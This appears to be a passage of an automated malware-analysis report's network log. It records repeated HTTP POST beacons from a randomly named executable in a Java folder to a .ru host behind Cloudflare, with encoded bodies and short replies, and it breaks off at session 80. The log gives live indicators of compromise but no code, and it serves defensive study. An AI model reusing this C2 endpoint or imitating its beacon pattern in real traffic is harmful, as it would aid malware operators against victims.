                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9659&min_rtt=4197&rtt_var=12498&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=30482&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  67 | 192.168.2.4 | 49834 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:59.456517935 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:59.816833973 CET | 1072 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:02:59.985574007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:00.271431923 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdqDLv73zVaqt9jc2Rlaq0Z0EflcotMZa4lbNTQO46%2F0cMKTYnQW5CtVPTaMP0eLoXiN5i1qQd820%2FC%2BQhWrUpWpUU9%2BsHPPBbqojqCrqF%2BhAM4KDJrgpebpBV2GSY4%2FqnfXq3tu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cdc9f7941f3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=61143&min_rtt=49266&rtt_var=26958&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=29635&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  68 | 192.168.2.4 | 49840 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:00.411031961 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:00.759402037 CET | 1072 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:03:00.865242004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:01.120338917 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZFbSEMEMHaPZjQIuy1oYcsiayafK5FzDcrnqmQASHRR9qbHOb7aRM3v7QD0WCFKJRh0Aa%2BPvu%2FsNxRoIvj48nOQaG7hSDa1KnyChkEGF9Ejchip0e15rObHO%2B7R3xXbTUO6BY6c"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ce21b8ade97-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6828&min_rtt=1460&rtt_var=11284&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=32876&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  69 | 192.168.2.4 | 49846 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:01.246016026 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:01.603075981 CET | 1072 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:03:01.693857908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:01.888957024 CET | 817 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fMk%2B%2FO9Mv10MRls%2FsGeuusWO76RvxzrOjVvj3qbecs4%2FIWdZwaKPSEFwMx%2FZ8V2J3HkjI55qU0Fh%2FEKYZUWk5IMl38%2F5OQU6nIves6LV%2FsRMqtdZ%2Ffud39MRDe36c8V79jzXpWbR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ce7496042cc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2116&min_rtt=1623&rtt_var=1594&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=262259&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  70 | 192.168.2.4 | 49852 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:02.010890007 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:02.369349003 CET | 1072 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:03:02.470474005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:02.717262030 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8Ta9Y978ZKdcN3v5m2sMunyUum3AqIo4BQezaNFsphN%2FQ%2FjgV5Cb5fc5E9V%2BVa7oc2q%2FUk4daGA2wprNoEAxVfFFXFH7WInBXolYNW2jMvCdhTaDqQbz4%2BhRNe04sQhrBZg%2FTFu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cec1df342dc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2858&min_rtt=1724&rtt_var=2914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=135222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  71 | 192.168.2.4 | 49859 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:02.861068964 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:03.212451935 CET | 1072 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:03:03.358174086 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  72 | 192.168.2.4 | 49864 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:03.359522104 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:03.712490082 CET | 1796 | OUT | [encoded request body]
                                                                                                                  Jan 1, 2025 15:03:03.831931114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:04.093955040 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkVranH6gzNXthlpgFdQ449k7lrUqw2P9aHAaNiifNeTgGrFnYIpJmIVxRKoRNj0REVSsyKZAMRp35O1M1VRBrQDSuyfqNp6EByrDNPmSHMit%2BFb0DVYsjo1Ayhr0ZJLLTGJkAP%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cf49b097d0b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6353&min_rtt=1990&rtt_var=9472&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=39572&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  73 | 192.168.2.4 | 49865 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:03.491189003 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:03.837615013 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:03.936372042 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:04.207452059 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bjmUf95jmCxROkYqXGPCTOshuVe2Wwm3tt0PlcqAgOxJKIDttGkPnvzhIxhjM2R1a9sy7DYkJ5iujApvc6Jae8C8zHh6i8tXoRoGNQvCoT%2BNw%2FlWCvKey%2FU5wq8TRRTsqOU3rBbd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cf54bab8c2d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1991&rtt_var=5834&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=65353&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49872 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:04.340539932 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:03:04.696798086 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:04.797986984 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:05.398511887 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztl%2Byg%2FrMpqxvBZGBzRSFp3zWb0%2FXKLzcMSxn%2B%2FZ7%2F%2Fl3P6E%2BKz2nFa%2BDYUqIQmUS2fmB5mXtYc9NneTpyIn34LL9QsbkUBhv%2F6fMmd6g2sEHdWcUCSaKo2%2BJ%2F512p6fVyWn%2FaBN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cfabfc6de9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3515&min_rtt=1465&rtt_var=4650&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=81710&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 1, 2025 15:03:05.485188007 CET | 14 | IN | Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49878 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:05.607769966 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:05.962578058 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:06.051875114 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:06.321315050 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkp4X3s3Jqgoob%2F3JQapzKm%2BQJ0JLZbyI33t1GiMxc59fRRKR9MYmznlyb9ItXqY8t7UIo48ARtPy%2BqIRi%2BWVIdpShJYtG2hUqKWFmLvtkTMOCQrx3YZmoxbigXfG3zXe%2BAb5xox"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d028cf94386-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1705&rtt_var=1254&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=350456&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49887 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:06.449063063 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:06.806524038 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:06.913144112 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:07.164849043 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNtvG60XiYlZW8sXBJ3nCnPLDxbO0iZE4YaJDnWxGotajRR%2B0eHyHkXQPO0opLdRKhCVHRkq66OIijaJqiVYjrsnqZ8QHD5OqCXf6mlU3o254KYnM5Ye3cPaNiCGTwY6cc8rxR5Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d07efefc44f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3495&min_rtt=1521&rtt_var=4518&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=84329&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49893 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:07.294213057 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:07.649972916 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:07.777196884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:08.043083906 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Vn3gIUngjyKwhYn4EMB%2FxqogT1klcv51jjvVcZa%2FhxMlostpwhzh%2BKI%2FbwL4wT412epeT8p0LnUyFiNWuHhZXIyTKvOgibcPVA2owd%2BD9RzhyTQak374h4mwcNGx%2B6MNHJiENJk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d0d4a2c0cc4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3016&min_rtt=1564&rtt_var=3490&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=110773&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49899 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:08.169076920 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:08.524950027 CET | 1072 | OUT | Data Raw: [encoded request body]
Jan 1, 2025 15:03:08.654587030 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:08.931304932 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KMwR%2FLx17u3m%2BJNJeGfftjJKDFkc%2Bs0clDYycY5GS5vzVVkiJYaic7NvnMSxruvXVJ3wcH2jbANCOyFlJsc0jePOSwJP9b%2BH%2FDbTHKeT2TRtcGZm5ALdKKU%2B8drPS%2FEfSdvCOKV9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d12cc720fa4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4584&min_rtt=1653&rtt_var=6482&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=58158&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49906 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:09.059232950 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49907 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
